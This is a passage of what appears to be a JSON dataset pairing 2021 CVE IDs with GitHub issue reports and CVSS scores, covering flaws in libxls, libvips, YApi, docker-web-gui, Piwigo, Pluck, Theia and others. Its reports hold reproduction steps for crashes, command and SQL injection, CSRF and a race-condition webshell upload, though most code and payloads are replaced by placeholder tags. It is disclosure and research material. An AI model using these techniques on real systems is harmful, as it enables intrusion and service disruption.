        "description": "libxls APITAG NULL pointer dereference vulnerability. libxls APITAG NULL pointer dereference INTRODUCTION A NULL pointer dereference vulnerability has been detected in the function APITAG when trying to access the rdi register that is NULL at that time. Looking at the code we can realize it is because of trying to access APITAG to that pointer, which is the argument for the function. The argument for APITAG comes from the return value of APITAG : APITAG If we enter the function APITAG : CODETAG We can easily deduce that if either num is less than NUMBERTAG or num is greater than APITAG the conditional won't succeed, thus returning pWS directly without assigning it a heap chunk. As the pointer has been initialized with NULL, a NULL pointer is returned, which will be the argument for the next function, and the program will crash when trying to access it. REPRODUCE To reproduce this crash, the APITAG file has been used with a specially crafted XLS file. The crafted file needs to have no ERRORTAG records to make APITAG be NUMBERTAG ERRORTAG ANALYSIS As I explained in the Introduction section, we need num to be less than NUMBERTAG or greater than APITAG . Having one (or both) of those requirements can trigger the NULL pointer dereference. In APITAG : APITAG The first condition will never fail as i will always be greater or equal to NUMBERTAG Also, i cannot be greater than APITAG as depends on it's value to be incremented. But... what if APITAG is equal to NUMBERTAG Then i will be NUMBERTAG too. In the conditional i won't be less than APITAG , but equal, thus failing the conditional. The function APITAG , responsible for incrementing the APITAG value is never executed with the current APITAG xls file, thus keeping until crash time the value which the program gave it when being initialized at APITAG : APITAG But how do we make the program to not execute APITAG ? We initially need to avoid any ERRORTAG record. If we craft an XLS file that do not contain any ERRORTAG record, this code will never reached: ERRORTAG And APITAG will be NUMBERTAG when reaching the conditional code. The result is a SIGSEGV APITAG fault) interruption crashing the program trying to access non mapped memory: CODETAG IMPACT The most common issue with this type of vulnerability is a Denial of Service APITAG once a crash has been triggered as demonstrated above with the crash APITAG SOLUTION A solution for this issue could be adding a pointer check before using it, and change the actions once a pointer is detected to be NULL. Patch example: ERRORTAG Obviously, the pointer is used multiple times in the code, so having it NULL is something not expected. A more complex patch is needed to avoid unexpected results for the next functions to be executed instead of just returning if a NULL pointer is detected. Anyway, a better solution for this patch is update the conditional at APITAG to this: APITAG This time, if num is equal to APITAG the heap chunk will be returned avoiding a NULL pointer being returned.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-27847",
        "Issue_Url_old": "https://github.com/libvips/libvips/issues/1236",
        "Issue_Url_new": "https://github.com/libvips/libvips/issues/1236",
        "Repo_new": "libvips/libvips",
        "Issue_Created_At": "2019-02-20T13:19:56Z",
        "description": "bugs found by our scanner. Hi, we developed a taint analysis based static analysis tool named Vanguard. It could prognosis potential vulnerabilities by identifying security sensitive operations (e.g. divide zero, mod zero, array index access, and sensitive function calls) without proper checks for their operands. Some code locations are listed in the following. We think these locations maybe bugs after our manual analysis. Please check them, and add precondition checks if necessary. APITAG Zero NUMBERTAG in function APITAG , zoom.c L NUMBERTAG L NUMBERTAG L NUMBERTAG URLTAG CODETAG APITAG CODETAG Divisor: zoom >xfac, zoom >yfac Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , point.c L NUMBERTAG URLTAG CODETAG Divisor: range Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , eye.c L NUMBERTAG URLTAG APITAG Divisor: h Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , mask.c L NUMBERTAG URLTAG APITAG Divisor: half_width, half_height Result: Could be NUMBERTAG Please Check. Array Index Bound NUMBERTAG in function APITAG , gamma.c L NUMBERTAG URLTAG APITAG Array expression: vips_gamma_maxval in APITAG needs bound checking NUMBERTAG APITAG APITAG APITAG APITAG needs bound checking NUMBERTAG APITAG APITAG APITAG APITAG needs bound checking NUMBERTAG APITAG APITAG Sensitive Function Call NUMBERTAG in function APITAG ,[ unpack_seek.c L NUMBERTAG URLTAG APITAG memcpy] is a security sensitive function using tainted data: [wphdr NUMBERTAG in function APITAG ,[ tiff2vips.c L NUMBERTAG URLTAG APITAG memcpy] is a security sensitive function using tainted data: [len NUMBERTAG in function APITAG ,[ sinkscreen.c L NUMBERTAG URLTAG APITAG memcpy] is a security sensitive function using tainted data: [len NUMBERTAG in function APITAG ,[ region.c L NUMBERTAG L NUMBERTAG URLTAG APITAG APITAG [memset] is a security sensitive function using tainted data: [wd ] [memcpy] is a security sensitive function using tainted data: [wd ]",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-27884",
        "Issue_Url_old": "https://github.com/YMFE/yapi/issues/2117",
        "Issue_Url_new": "https://github.com/ymfe/yapi/issues/2117",
        "Repo_new": "ymfe/yapi",
        "Issue_Created_At": "2021-02-23T14:55:07Z",
        "description": "Potential security vulnerability in APITAG APITAG Security Lab (GHSL) Vulnerability Report: APITAG Summary Weak random number generator is used to sign JSON Web Token (JWT). Product APITAG URLTAG Tested Version The latest commit to the date NUMBERTAG e1f NUMBERTAG URLTAG . Details JWT signing Function APITAG URLTAG is using a cryptographically insecure pseudo random number generator APITAG to create a randomly looking string that later is used to sign and verify issued tokens: APITAG When a new user is created the APITAG function is used to generate a passsalt . It is used as a salt to hash the password and as the secret to sign a JWT that authenticates the user: CODETAG The APITAG returns a floating point number that is more than or equal to NUMBERTAG and less than NUMBERTAG The call to APITAG formats the number as base NUMBERTAG For example, APITAG gets encoded as APITAG . The first two characters are trimmed and the result is APITAG . The generated secret is mostly NUMBERTAG characters long and consists of numbers and lowercase Latin alphabet characters only. Since the trimmed part is always APITAG the calculation is completely reversible. The weakness of cryptographically insecure pseudo random number generators is that given some number of observed values the internal state of the generator can be recreated that reveals the numbers generated in the past or allows calculation of the future outputs. The internal state of the current implementation of APITAG in FILETAG (a modification of APITAG algorithm) can be recreated from three observed consecutive values. To get the values an attacker may automate the user creation process to get three new user tokens rapidly, then run a brute force attack on the JWT HMAC signatures. This still should not be feasible to do in a reasonable time on a single machine like: CODETAG However a very rough estimation shows that by using cloud computing the attack could cost from NUMBERTAG to NUMBERTAG to break the tokens APITAG three values versus one value has very little penalty as cracking machines are optimized for multiple hashes and cracking a single hash doesn't fully utilize computer resources). Please notice that the token's NUMBERTAG days expiration time doesn't put a limit on the attack as the target is the passsalt value used to sign the token. Impact After successfully brute forcing the three pseudo random values the attacker may recreate the passsalt values that are used to sign tokens of other users. It may be argued if there is an incentive to spend this amount of resources, but GPUs get better all the time. Remediation Use APITAG to get at least NUMBERTAG bytes random value in APITAG . Consider not using the passsalt for signing JWT, but using a NUMBERTAG bits secret from the server configuration environment. Credit This issue was discovered and reported by GHSL team member MENTIONTAG APITAG Loba\u010devski) URLTAG . Contact You can contact the GHSL team at APITAG , please include a reference to APITAG in any communication regarding this issue. Disclosure Policy This report is subject to our coordinated disclosure policy URLTAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.1,
        "impactScore": 2.5,
        "exploitabilityScore": 2.5
    },
    {
        "CVE_ID": "CVE-2021-27884",
        "Issue_Url_old": "https://github.com/YMFE/yapi/issues/2263",
        "Issue_Url_new": "https://github.com/ymfe/yapi/issues/2263",
        "Repo_new": "ymfe/yapi",
        "Issue_Created_At": "2021-07-15T11:41:16Z",
        "description": "YAPI NUMBERTAG days\u6f0f\u6d1e\uff0c\u53d1\u73b0\u670d\u52a1\u5668\u4ee3\u7801\u5360\u6ee1\u4e86. \u7248\u672c\u53f7 ~ \u4ec0\u4e48\u95ee\u9898 ~ \u5982\u4f55\u590d\u73b0\u6b64\u95ee\u9898 ~ APITAG \u4ec0\u4e48\u6d4f\u89c8\u5668 ~ APITAG Windows, APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.1,
        "impactScore": 2.5,
        "exploitabilityScore": 2.5
    },
    {
        "CVE_ID": "CVE-2021-27886",
        "Issue_Url_old": "https://github.com/rakibtg/docker-web-gui/issues/23",
        "Issue_Url_new": "https://github.com/rakibtg/docker-web-gui/issues/23",
        "Repo_new": "rakibtg/docker-web-gui",
        "Issue_Created_At": "2021-01-31T02:00:31Z",
        "description": "Security: lack of input validation in APIs leads to command injection. For example, making GET requests such as the following results in arbitrary commands being executed on the server, outside of the intended docker process only. This is otherwise known as a remote command injection bug (especially since FILETAG listens on the network interface by default, accessible by anyone on the network, even though the intended access is localhost). > URLTAG ERRORTAG For example executing the id command may return: APITAG Some of the other APIs seem vulnerable to injection as well. Recommended easiest fix would be the following NUMBERTAG allow only alphanumeric characters in the parameters (strings that actually look like container and image names NUMBERTAG have a list of allowed commands such as start/stop, etc. Ensure this simple validation routine validates the user input before concatenating parameters and calling APITAG . Return a \"bad parameter\" error message if the validation doesn't pass. Additional references for hardening the code FILETAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27935",
        "Issue_Url_old": "https://github.com/AdguardTeam/AdGuardHome/issues/2470",
        "Issue_Url_new": "https://github.com/adguardteam/adguardhome/issues/2470",
        "Repo_new": "adguardteam/adguardhome",
        "Issue_Created_At": "2020-12-21T18:37:22Z",
        "description": "Hash of the password stored in the cookies. It [seems]( URLTAG ) that the username as well as the bcrypt'ed password have their sha NUMBERTAG stored in the cookie. This is a bit worrying, since an attacker able to get the cookie would not only gain access to AGH, but also be able to bruteforce offline the password. A possible way to address this would be to use a random string instead of APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27973",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1352",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1352",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2021-03-01T11:44:16Z",
        "description": "SQL injection in settings language in version NUMBERTAG Login with admin or users can set the language NUMBERTAG Send the following payload and follow redirect: db user : URLTAG FILETAG db version: URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-27983",
        "Issue_Url_old": "https://github.com/maxsite/cms/issues/430",
        "Issue_Url_new": "https://github.com/maxsite/cms/issues/430",
        "Repo_new": "maxsite/cms",
        "Issue_Created_At": "2021-03-02T02:16:46Z",
        "description": "Remote Code Execution Vulnerability In APITAG CMS NUMBERTAG After the administrator logged in, open the APITAG page. Select any of the files, change the contents to poc and save. poc\uff1a APITAG FILETAG Open the APITAG page and the code has been executed. FILETAG From: EMAILTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-27984",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/98",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/98",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2021-03-03T16:03:21Z",
        "description": "Pluck NUMBERTAG admin background exists a remote command execution vulnerability when uploading files. I uploaded any file in the \"manage files\" section, here I uploaded a NUMBERTAG jpg\". FILETAG Found two files at the upload folder. FILETAG Looked at the source code for the delete file function. On lines NUMBERTAG and NUMBERTAG of PATHTAG the logic is that the file \".htaccess\" is not allowed to be deleted. But it can be bypassed. FILETAG I clicked on the delete button on the page for NUMBERTAG jpg\" and sniffered the packet. FILETAG Change the value of the request parameter \"var\" to APITAG (the suffix name is not case sensitive in Windows) FILETAG APITAG is already in the trash. FILETAG The \".htaccess\" in the upload folder has been copied to the trash folder. FILETAG Looked at the source code for the upload function, lines NUMBERTAG to NUMBERTAG of PATHTAG FILETAG The code logic is as follows NUMBERTAG First check if the file suffix is \".htaccess NUMBERTAG then check if the file suffix is in the blacklist NUMBERTAG If the suffix is in the blacklist, add the suffix \".txt\" for renaming and give permission NUMBERTAG If the suffix name is not in the blacklist, then give permission directly. Use race condition for attacks. First I create a APITAG file. poc: APITAG FILETAG Upload the file and sniffer a packet of the upload request and send it to intruder (add variable a NUMBERTAG to keep sniffering the request packet). FILETAG Then sniffer a packet that accesses the file and send it to intruder. FILETAG Both intruder types are selected as APITAG and the number is NUMBERTAG FILETAG Threads are set to NUMBERTAG FILETAG Start the attack, when the status of the request to access the file is NUMBERTAG it means that the file was uploaded successfully and the code was executed. FILETAG FILETAG Upload webshell with race condition and successfully gain access to the server. exploit\uff1a FILETAG FILETAG APITAG the \".php\" file only exists when the race condition is in place, if the race condition is stopped the \".php\" file will still be a \". APITAG file, so the shell will disconnect. The shell will then disconnect. (So maintaining permissions requires that race condition be maintained at all times) From: EMAILTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-28021",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1108",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/1108",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2021-03-04T10:19:50Z",
        "description": "heap overflow in APITAG heap overflow by a craft jpeg file in APITAG poc FILETAG asan report: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-28040",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1953",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1953",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2021-02-23T14:37:16Z",
        "description": "os_xml APITAG Uncontrolled recursion vulnerability leading to APITAG (SIGSEGV). os_xml APITAG Uncontrolled recursion vulnerability INTRODUCTION An Uncontrolled Recursion vulnerability has been identified in the APITAG XML parsing library used by OSSEC. Through the APITAG code, a flaw has been identified in APITAG that allows non defined recursion cycles, thus finally trying to access non mapped memory once the stack end has been reached. The payload consists on a number of APITAG which will trigger the recursion and finally ending it with APITAG . REPRODUCE To reproduce this vulnerability, compile the APITAG and open the payload file with it. CODETAG If we compile APITAG with ASAN APITAG this is the output we are given: ERRORTAG As we can see an unlimited number of recursion calls can be performed, ending on a SIGSEGV APITAG fault). Attention! : If a SIGSEGV is not triggered, try adding more APITAG in the payload. The segmentation fault error is because we reach the end of the stack, so it depends on the offset until the end of it, which may differ in your situation. ANALYSIS There exists a non limited recursion in the APITAG function: ERRORTAG If we debug it after specifying the crash file as argument: ERRORTAG A SIGSEGV APITAG fault) happens when trying to access invalid memory as the rsp register contains an address that is not mapped. IMPACT The most common issue with this type of vulnerability is a Denial of Service APITAG once a crash has been triggered as demonstrated above with the crash APITAG SOLUTION The best solution to this vulnerability is implementing a code that controls the number of allowed recursions, or redesigning the methodology to loop over the XML tags using a while or for loop instead of recursing if the number of needed iterations is huge, resulting in a Stack exhaustion. The APITAG is performed due to the creation of a new frame in the stack for each new function being called. Creation of a big amount of frames results after a lot of iterations in consuming up the available stack memory, and once reached non mapped memory a segmentation fault interruption will happen. An important factor that decreases a lot the needed iterations to finally trigger the bug is the existence of three big stack buffers in the recursive function. Another useful change would be using dynamic memory with APITAG or APITAG when big amount of space is needed, also it can be reused instead of creating a chunk or stack buffer for each function call.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28070",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/31",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/31",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2021-03-06T07:06:24Z",
        "description": "I found a CSRF vulnerability to delete user. One: use CSRF vulnerability to delete user Vulnerability details: When the administrator logs in, opening the webpage will automatically delete the specified user. Vulnerability url: URLTAG Vulnerability POC: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-28099",
        "Issue_Url_old": "https://github.com/Netflix/hollow/issues/502",
        "Issue_Url_new": "https://github.com/netflix/hollow/issues/502",
        "Repo_new": "netflix/hollow",
        "Issue_Created_At": "2021-01-24T16:49:45Z",
        "description": "Please open a security advisory. Hello Netflix Hollow Team, I'd like to report a potential security vulnerability in Netflix hollow. Please open a private security advisory so we can discuss the issue. URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.4,
        "impactScore": 2.5,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-28119",
        "Issue_Url_old": "https://github.com/xanderfrangos/twinkle-tray/issues/142",
        "Issue_Url_new": "https://github.com/xanderfrangos/twinkle-tray/issues/142",
        "Repo_new": "xanderfrangos/twinkle-tray",
        "Issue_Created_At": "2021-03-09T16:37:44Z",
        "description": "Potential command execution vulnerability introduced by unsafe IPC exposure. Hi, Great work! We did a security analysis on the app and found that the risky APITAG is directly exposed to the unsafe renderer process. This may allow remote attackers to abuse sensitive methods in the (privileged) main process by crafting malicious IPC messages. Vulnerability Details The following code shows how a preload script exposes IPC. URLTAG We do find exploitable IPC endpoints. e.g., If the attacker sends a malicious msg to APITAG channel, he may execute arbitrary commands via APITAG . URLTAG Mitigation enforce security checks when receiving events on sensitive channels (e.g., check if received URL is legal before APITAG avoid directly exposing APITAG to untrusted domains.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28122",
        "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/837",
        "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/837",
        "Repo_new": "open5gs/open5gs",
        "Issue_Created_At": "2021-03-10T13:18:52Z",
        "description": "Authentication Bypass in Webui. An unauthenticated user can utilize information provided by the login page of the webui component to craft HTTP requests that will allow that user to create, read, update, and delete entries in the subscriber database. This includes the ability to add administrative users, PATHTAG subscribers, and PATHTAG profiles. Properly crafted HTTP GET and DELETE requests with empty bodies will cause data to be returned or deleted on the following routes: URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG Properly crafted HTTP POST,PUT and PATCH requests with properly crafted bodies will cause data to be inserted or updated on the following routes: URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG This is caused by the configuration of express js in FILETAG . This should be updated to correctly validate the user making the API calls.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28128",
        "Issue_Url_old": "https://github.com/strapi/strapi/issues/9657",
        "Issue_Url_new": "https://github.com/strapi/strapi/issues/9657",
        "Repo_new": "strapi/strapi",
        "Issue_Created_At": "2021-03-09T17:43:20Z",
        "description": "Ask for password . Feature request Make every \"update user password\" process in the Admin panel safer by asking to confirm the currently active password Please describe your feature request [ ] I have created my request on the Product Board before I submitted this issue [x] I have looked at all the other requests on the Product Board before I submitted this issue Summary It is currently possible to update a user's password without having to confirm their currently active password. A general improvement would be to ask for some current active password confirmation (at least the one of the user asking for a change) before processing the update. Why is it needed? The user password update process should be more committing to prevent unmeant or malicious changing actions. Suggested solution(s) Ask for a current password confirmation before updating a user's password through the admin panel Related issue(s)/PR(s)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-28134",
        "Issue_Url_old": "https://github.com/AkashRajpurohit/clipper/issues/13",
        "Issue_Url_new": "https://github.com/akashrajpurohit/clipper/issues/13",
        "Repo_new": "akashrajpurohit/clipper",
        "Issue_Created_At": "2021-03-09T01:33:30Z",
        "description": "Potential Command Execution vulnerabilities introduced by FILETAG . Hi, We found that APITAG introduces dangerous API APITAG for arbitrary access on unsafe renderer process. This may lead to remote command execution. We suggest that a URL check should be enforced at L NUMBERTAG which enforces an allowlist on trusted urls. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28154",
        "Issue_Url_old": "https://github.com/camunda/camunda-modeler/issues/2143",
        "Issue_Url_new": "https://github.com/camunda/camunda-modeler/issues/2143",
        "Repo_new": "camunda/camunda-modeler",
        "Issue_Created_At": "2021-03-09T16:17:42Z",
        "description": "Arbitrary filesystem manipulation vulnerability introduced by ipc exposure. APITAG the Bug__ Hi, We found that APITAG directly expose risky APITAG instance to unsafe renderer process, which enables a remote attacker to abuse sensitive methods in the main process by crafting malicious ipc message. I notice that the app has already disabled node integration in unsafe renderers( URLTAG which is good. However, such directly IPC export may re expose many sensitive primitives to the attacker. Here is the exposure site. URLTAG By sending a message to APITAG channel. The attacker may read and write malicious content to the user filesystem. URLTAG APITAG Behavior__ I could think of two possible solutions: enforce security checks when receiving events on sensitive channels (e.g., file read/write). avoid directly exposing APITAG to untrusted domains.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28161",
        "Issue_Url_old": "https://github.com/eclipse-theia/theia/issues/8794",
        "Issue_Url_new": "https://github.com/eclipse-theia/theia/issues/8794",
        "Repo_new": "eclipse-theia/theia",
        "Issue_Created_At": "2020-11-28T23:36:58Z",
        "description": "XSS in Debug Console FILETAG (L NUMBERTAG FILETAG I think this issue is similar to NUMBERTAG Steps to Reproduce: See also the FILETAG . FILETAG Additional Information Theia Version: Theia NUMBERTAG Questions Theia is an important open source project, but it hasn't set a Github security policy. Should it have one?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-28162",
        "Issue_Url_old": "https://github.com/eclipse-theia/theia/issues/7283",
        "Issue_Url_new": "https://github.com/eclipse-theia/theia/issues/7283",
        "Repo_new": "eclipse-theia/theia",
        "Issue_Created_At": "2020-03-05T15:45:25Z",
        "description": "Javascript injection via notification messages. Description In the notification messages there is no an HTML escaping, so Javascript code can run. I'm not sure, but I think the issue is in PATHTAG URLTAG APITAG In Electron app an arbitrary JS code can lead to dangerous exploits. Reproduction Steps Create a new project and create a new debugger configuration file APITAG In the type field write the Javascript payload (e.g. APITAG ) Press F5 to launch the debugger and see the alert box FILETAG OS and Theia version: Ubuntu NUMBERTAG Theia Electron Example NUMBERTAG I think this bug is a vulnerability, I can exfiltrate data from victim's computer by using JS. Here a proof of concept video. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-28167",
        "Issue_Url_old": "https://github.com/eclipse/openj9/issues/12016",
        "Issue_Url_new": "https://github.com/eclipse-openj9/openj9/issues/12016",
        "Repo_new": "eclipse-openj9/openj9",
        "Issue_Created_At": "2021-02-21T22:28:06Z",
        "description": "APITAG sometimes will be invoked after static method being invoked.. ERRORTAG Considering the test case below: ERRORTAG and the output is: ERRORTAG We will find that APITAG was invoked after APITAG being invoked. If we run it with hotspot, the result is: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28170",
        "Issue_Url_old": "https://github.com/eclipse-ee4j/el-ri/issues/155",
        "Issue_Url_new": "https://github.com/jakartaee/expression-language/issues/155",
        "Repo_new": "jakartaee/expression-language",
        "Issue_Created_At": "2021-04-14T18:51:51Z",
        "description": "GHSL NUMBERTAG Bypass input sanitization of EL expressions . Github posted this publicly about NUMBERTAG weeks ago URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28233",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/11",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/11",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2021-03-05T13:29:01Z",
        "description": "heap buffer overflow in function APITAG at APITAG Version dev version, git clone FILETAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command APITAG Result APITAG Although the results of the running are correct, when I used our vulnerability detection tool to detect, I found that a heap buffer overflow occurred in line NUMBERTAG Looking Description for detailed description. Description When I used gdb for debugging with the following command\uff1a APITAG Obtaining the start address and size of the decoder with the help of the above command\uff0cwhich explaining that the valid address range of the decoder is in FILETAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-28236",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/324",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/324",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2021-03-03T09:19:26Z",
        "description": "Four NULL dereference in out_dxfb.c. I found four NULL dereference bugs in the current master NUMBERTAG d2c NUMBERTAG f). Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure bug NUMBERTAG in APITAG Command APITAG ASAN report ERRORTAG bug NUMBERTAG in APITAG Command APITAG ASAN report ERRORTAG bug NUMBERTAG in APITAG Command APITAG ASAN report ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28237",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/325",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/325",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2021-03-04T04:20:26Z",
        "description": "Heap buffer overflow in APITAG I found a heap buffer overflow in the current master NUMBERTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command APITAG ASAN report ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28242",
        "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/109",
        "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/109",
        "Repo_new": "b2evolution/b2evolution",
        "Issue_Created_At": "2021-02-26T10:12:06Z",
        "description": "Responsible Disclosure Security Issue. Hi Team, We have identified a Critical security issue and we would like to report back to you since it is supposed to fixed ASAP . We tried to contact you via the b2evolution forum. Since there was no response just trying to reach you via all mode. Kindly help us with your mail id so we can report it directly to the correct person as part of responsible disclosure.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-28245",
        "Issue_Url_old": "https://github.com/M40k1n9/vulner/issues/1",
        "Issue_Url_new": "https://github.com/m40k1n9/vulner/issues/1",
        "Repo_new": "m40k1n9/vulner",
        "Issue_Created_At": "2021-03-09T07:34:55Z",
